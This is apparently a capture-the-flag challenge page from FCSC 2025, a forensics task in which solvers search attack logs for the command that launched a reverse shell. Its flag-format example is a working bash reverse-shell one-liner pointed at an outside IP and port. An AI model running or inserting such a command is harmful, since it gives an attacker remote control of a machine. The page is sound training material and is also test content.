SOCrate 2/6 - Reverse shell

forensics linux windows FCSC 2025 solved on

star star

Description

In June 2023, an operator of vital importance falls victim to an attack that compromises its entire information system. You received the Linux and Windows logs and must answer the investigators’ questions.

This challenge is part of a serie. The parts are numbered in the chronological order of the attack, but it is not necessary to solve them in order :


The attacker executed a reverse shell on a machine. Find the command corresponding to the execution of this reverse shell.

Flag format: FCSC{COMAND_LINE}

Example: FCSC{bash -i >& /dev/tcp/10.42.43.44/1234 0>&1}

Files

  • socrate.tar.xz
    237.27 MiB – f2ac337b372fba041ecccb20d18cf00401ab428457a68460bdfef4090e2b2313

Author

ribt

Flag

Share my success on Fediverse, Twitter, Linkedin, Facebook, or via email.

Submit your solution

You can submit your writeup for this challenge. Read the FAQ to learn how to proceed.

You need to be logged in to submit a writeup.

Writeups

I've been looking for a long time and I still can't find the flag!

You can vote for the solutions you prefer by using the on their respective pages.

DateAuthor Language Tags
2025-06-06
vidalan
🇫🇷